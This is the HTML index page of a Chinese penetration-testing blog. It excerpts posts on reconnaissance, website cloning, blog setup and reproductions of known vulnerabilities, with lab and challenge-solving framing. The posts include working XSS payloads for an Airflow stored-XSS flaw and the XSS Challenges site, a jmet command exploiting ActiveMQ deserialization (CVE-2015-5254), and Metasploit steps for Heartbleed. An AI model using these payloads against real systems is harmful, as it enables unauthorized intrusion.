<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>Posts | Atmet</title><meta name=keywords content><meta name=description content="0opsdc!"><meta name=author content="DaChui"><link rel=canonical href=https://oopsdc.tk/post/><link href=/assets/css/stylesheet.min.746a86b58bb2b052b5e4df8216510494f04f81e62c08d626150c26c69ca929da.css integrity="sha256-dGqGtYuysFK15N+CFlEElPBPgeYsCNYmFQwmxpypKdo=" rel="preload stylesheet" as=style><link rel=icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=icon type=image/png sizes=16x16 href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=icon type=image/png sizes=32x32 href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=apple-touch-icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><link rel=mask-icon href=https://oopsdc.tk/%3Clink%20/%20abs%20url%3E><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><meta name=generator content="Hugo 0.83.1"><link rel=alternate type=application/rss+xml href=https://oopsdc.tk/post/index.xml><meta property="og:title" content="Posts"><meta property="og:description" content="0opsdc!"><meta property="og:type" content="website"><meta property="og:url" content="https://oopsdc.tk/post/"><meta property="og:image" content="https://oopsdc.tk/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta property="og:site_name" content="Atmet"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://oopsdc.tk/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta name=twitter:title content="Posts"><meta name=twitter:description content="0opsdc!"><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://oopsdc.tk/post/"}]}</script></head><body class=list id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add('dark'):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove('dark'):window.matchMedia('(prefers-color-scheme: dark)').matches&&document.body.classList.add('dark')</script><noscript><style type=text/css>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:#1d1e20;--entry:#2e2e33;--primary:rgba(255, 255, 255, 0.84);--secondary:rgba(255, 255, 255, 0.56);--tertiary:rgba(255, 255, 255, 0.16);--content:rgba(255, 255, 255, 0.74);--hljs-bg:#2e2e33;--code-bg:#37383e;--border:#333}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><header class=header><nav class=nav><div class=logo><a href=https://oopsdc.tk/ accesskey=h title="Home (Alt + H)">Home</a>
<span class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></span></div><ul id=menu onscroll=menu_on_scroll()><li><a href=https://oopsdc.tk/archives/ title=Archives><span>Archives</span></a></li><li><a href=https://oopsdc.tk/links/ title=Links><span>Links</span></a></li><li><a href=https://oopsdc.tk/search/ title="Search (Alt + /)" accesskey=/><span>Search</span></a></li><li><a href=https://oopsdc.tk/tags/ title=Tags><span>Tags</span></a></li></ul></nav></header><main class=main><header class=page-header><div class=breadcrumbs><a href=https://oopsdc.tk/>Home</a></div><h1>Posts</h1></header><article class=post-entry><header class=entry-header><h2>信息收集</h2></header><section class=entry-content><p>信息收集概念 进行渗透测试之前，最重要的一步就是信息收集。
信息收集的主要内容:收集服务器配置信息、网站敏感信息等，包括域名、子域名信息、目标网站系统CMS指纹、目标网站真实IP、开放端口等。
1、收集域名信息 知道目标域名后，第一件事就是获取域名注册信息，包括域名DNS服务器信息及注册人联系信息等。
Whois命令查询 概念:Whois是一个标准互联网协议，可用于收集网络注册信息，如注册域名、IP等。
原理:Whois就是一个用于查询域名是否被注册及注册域名详细信息的数据库。
作用:获得注册人姓名和邮箱，通过社工进一步获取其它信息。
用法:
whois baidu.com 在线Whois查询网站:
站长工具_whois查询工具_爱站网 (aizhan.com)
域名Whois查询 - 站长之家 (chinaz.com)
VirusTotal
2、查询备案信息 概念:网站备案是工具国家法律法规规定，需要网站所有者向国家有关部门申请的备案。这是国家信息产业部对网站的一种管理。
注意:若网站搭建在其他国家，则不需进行备案。
在线备案信息查询网站:
天眼查-商业查询平台_企业信息查询_公司查询_工商查询_企业信用信息系统 (tianyancha.com)
3、收集敏感信息 搜索关键字 通过搜索引擎构造特殊关键字语法来搜索互联网上的相关敏感信息。还可用其来收集数据库文件、SQL注入、配置信息、源码泄露、未授权访问和robots.txt等敏感信息。
常用搜索语法(各搜索引擎大同小异):
语法 作用 Site 指定域名 Inurl URL存在关键字的网页 Intext 网页正文中的关键字 Filetype 指定文件类型 Intitle 网页标题中的关键字 link link:baidu.com 表示返回所有和baidu.com做了链接的URL Info 查找指定站点的基本信息 cache 搜索Google中关于某些内容的缓存 一般可以把语法结合使用以获得更准确的信息。...</p></section><footer class=entry-footer>June 25, 2021&nbsp;·&nbsp;2 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to 信息收集" href=https://oopsdc.tk/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/></a></article><article class=post-entry><header class=entry-header><h2>Web漏洞</h2></header><section class=entry-content><p>Apache Airflow 存储型XSS 漏洞描述 Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞，该漏洞源于WEB应用缺少对客户端数据的正确验证，使得攻击者可利用该漏洞执行客户端代码。
影响版本 Apache Airflow 1.10.3以下版本。
复现思路 漏洞复现 访问/admin/dagrun/(默认不需要密码)
创建一个项目，输入ID后点击保存，返回列表，点击running字样，发现能够输入HTML代码，例:
&lt;script>_a="https://www.baidu.com"&lt;/script> &lt;script>document.location=_a&lt;/script> 能直接造成存储型XSS。
ActiveMQ 反序列化漏洞 CVE-2015-5254 漏洞描述 Apache ActiveMQ是Apache软件经济会研发的一套开源消息中间件，支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前版本，即5.x版本中存在反序列化漏洞，该漏洞源于程序没有限制可在代理中序列化的类，攻击者可借助特制的序列化Java消息服务(JMS) ObjectMessage对象利用该漏洞执行任意代码。
影响版本 Apache ActiveMQ 5.13.0之前的5.x版本。
复现思路 1.构造(可使用ysoserial)可执行命令的序列化对象。
2.作为一个消息，发送给目标61616端口。
3.访问web管理页面，读取消息，触发漏洞。
漏洞复现 使用jmet进行漏洞利用:https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
下载好之后在jmet-0.1.0-all.jar同级目录下创建external文件夹，避免出现文件夹不存在的报错。
jmet的原理是使用jar包内置ysoserial生成Payload并发送，我们需要在ysoserial的gadget选择一个可使用的，如ROME。
给目标ActiveMQ添加一个名为event的队列，点击事件为生成/tmp/vuln文件:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/vuln" -Yp ROME &lt;ip> 61616 # 命令执行成功后回显如下 INFO d.c.j.t.JMSTarget [main] Connected with ID: ID:&lt;server-id> INFO d.c.j.t.JMSTarget [main] Sent gadget "ROME" with command: "touch /tmp/vuln" INFO d....</p></section><footer class=entry-footer>June 17, 2021&nbsp;·&nbsp;7 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to Web漏洞" href=https://oopsdc.tk/post/web%E6%BC%8F%E6%B4%9E/></a></article><article class=post-entry><header class=entry-header><h2>服务器应用漏洞</h2></header><section class=entry-content><p>OpenSSL OpenSSL 心脏滴血漏洞 CVE-2014-0160 漏洞描述 2014年4月7日，OpenSSL发布安全公告，在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞，漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。
影响版本 OpenSSL 1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等。
复现思路 漏洞复现 环境搭建:
git clone https://github.com/vulhub/vulhub.git cd vulhub/openssl/heartbleed docker-compose up -d 使用msf对目标进行攻击:
msfconsole set RHOST &lt;ip> set verbose true run 本文链接:服务器应用漏洞 | Atmet (oopsdc.tk)
文章许可:本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。</p></section><footer class=entry-footer>June 17, 2021&nbsp;·&nbsp;1 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to 服务器应用漏洞" href=https://oopsdc.tk/post/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/></a></article><article class=post-entry><header class=entry-header><h2>博客搭建</h2></header><section class=entry-content><p>博客搭建 hugo Hugo官方网站:https://gohugo.io
本文以PaperMod主题为例，官方文档:Installation · adityatelange/hugo-PaperMod Wiki (github.com)
需求准备 Hugo:Releases · gohugoio/hugo (github.com)
安装步骤 1.解压压缩包 2.配置环境变量 D:\Env\hugo_0.83.1
3.初始化博客 官方文档推荐我们使用易读性更高的yml格式初始化博客。
hugo new site &lt;name of site> -f yml
4.指定主题 在config.yml文件中设置主题。
theme: PaperMod
5.本地启动 先在本地看看网站跑起来的效果
hugo server
6.创建GitHub仓库 具体操作详见之后的hexo主题教学。
7.修改baseUrl 将config.yml文件中的baseUrl修改为刚刚创建的仓库。
baseURL: "https://&lt;username>.github.io/"
8.生成public文件夹 public中包含所有静态页面的内容，我们需要生成这个文件夹并上传到远程仓库中，完成博客部署。
hugo
9.push到远程仓库 # 配置代理 git config --global http.proxy socks5://127.0.0.1:&lt;port> git config --global https.proxy socks5://127.0.0.1:&lt;port> # 更改默认分支 git push -u origin main # push文件 cd public git init git add ....</p></section><footer class=entry-footer>June 12, 2021&nbsp;·&nbsp;4 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to 博客搭建" href=https://oopsdc.tk/post/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/></a></article><article class=post-entry><header class=entry-header><h2>XSS Challenges</h2></header><section class=entry-content><p>题目地址:https://xss-quiz.int21h.jp/
Stage #1 Hint: Very simple…
直接输入测试语句:
&lt;sCript>alert(document.domain);&lt;/Script> Stage #2 Hint: Close the current tag and add SCRIPT tag…
上测试语句:
&lt;sCript>alert(document.domain);&lt;/Script> 然后审查元素，只需要把input标签闭合就能执行我们的语句了。
">&lt;sCript>alert(document.domain);&lt;/Script> Stage #3 Hint: The input in text box is properly escaped.
这个页面有两个input标签，先在搜索框输入我们的测试语句试试。
直接把我们的语句放到&lt;b>标签里了，但是这旁边不是还有一个input标签吗。把两者的name互换一下即可。
Stage #4 Hint: Invisible input field.
审查元素发现有三个input标签，第三个标签的属性是hidden，把它改为text，然后把input标签闭合。
">&lt;sCript>alert(document.domain);&lt;/Script> Stage #5 Hint: Length limited text box.
审查元素，发现搜索框的长度被限制，修改maxlength的值即可。
">&lt;sCript>alert(document.domain);&lt;/Script> Stage #6 Hint: Event handler attributes....</p></section><footer class=entry-footer>June 10, 2021&nbsp;·&nbsp;1 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to XSS Challenges" href=https://oopsdc.tk/post/xss-challenges/></a></article><article class=post-entry><header class=entry-header><h2>Test</h2></header><section class=entry-content><p>He11o, th1s 1s a test!
#include &lt;stdio.h>int main() { pritnf("Hello World!"); } 本文链接:Test | Atmet (oopsdc.tk)
文章许可:本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。</p></section><footer class=entry-footer>May 28, 2021&nbsp;·&nbsp;1 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to Test" href=https://oopsdc.tk/post/test/></a></article><article class=post-entry><header class=entry-header><h2>网站镜像克隆</h2></header><section class=entry-content><p>使用wget克隆网站 使用方法 我们可以使用man wget命令查看帮助文档。
操作命令及参数解释如下：
wget -m -p -E -k -K -np -v https://www.baidu.com/ # 参数解释 -m : 镜像，选择该选项适用于Web站点 -p : 页面获取的先决条件，该选项确保包含了请求的图片和css脚本文件被下载(可以更好复制html5站点) -E : 适用于拓展，可以在本地另存一个html文件 -k : 转换链接，确保文件本转换，适用于本地浏览 -K : 转换备份文件，将以orig为后缀作为原始文件 -np : 不要到上一层子目录中 -v : 显示过程，不显示过程为-nv 克隆结果 # 克隆后在当前目录下会出现一个与网站同名的子目录，树形结构如下 www.baidu.com ├── index.html ├── index.html.orig └── robots.txt 0 directories, 3 files 使用HTTrack克隆网站 使用方法 httrack # 进入软件后需要输入项目名 baidu # 克隆后的存放地址 /home/oopsdc/Desktop # 要克隆的网站地址 www.baidu.com # 有6个选项，此处我们选2，具有向导递归层级的镜像网站 2 # 接下来的部分全选默认选项 默认回车 克隆结果 baidu ├── backblue....</p></section><footer class=entry-footer>April 20, 2021&nbsp;·&nbsp;1 min&nbsp;·&nbsp;DaChui</footer><a class=entry-link aria-label="post link to 网站镜像克隆" href=https://oopsdc.tk/post/%E7%BD%91%E7%AB%99%E9%95%9C%E5%83%8F%E5%85%8B%E9%9A%86/></a></article><footer class=page-footer><nav class=pagination><a class=next href=https://oopsdc.tk/post/page/2/>Next Page »</a></nav></footer></main><footer class=footer><span>&copy; 2021 <a href=https://oopsdc.tk/>Atmet</a></span>
<span>&#183;</span>
<span>Powered by <a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a></span>
<span>&#183;</span>
<span>Theme <a href=https://git.io/hugopapermod rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)"><button class=top-link id=top-link type=button accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></button></a>
<script>window.onload=function(){localStorage.getItem("menu-scroll-position")&&(document.getElementById('menu').scrollLeft=localStorage.getItem("menu-scroll-position"))};function menu_on_scroll(){localStorage.setItem("menu-scroll-position",document.getElementById('menu').scrollLeft)}document.querySelectorAll('a[href^="#"]').forEach(a=>{a.addEventListener("click",function(b){b.preventDefault();var a=this.getAttribute("href").substr(1);window.matchMedia('(prefers-reduced-motion: reduce)').matches?document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView({behavior:"smooth"}),a==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${a}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove('dark'),localStorage.setItem("pref-theme",'light')):(document.body.classList.add('dark'),localStorage.setItem("pref-theme",'dark'))})</script></body></html>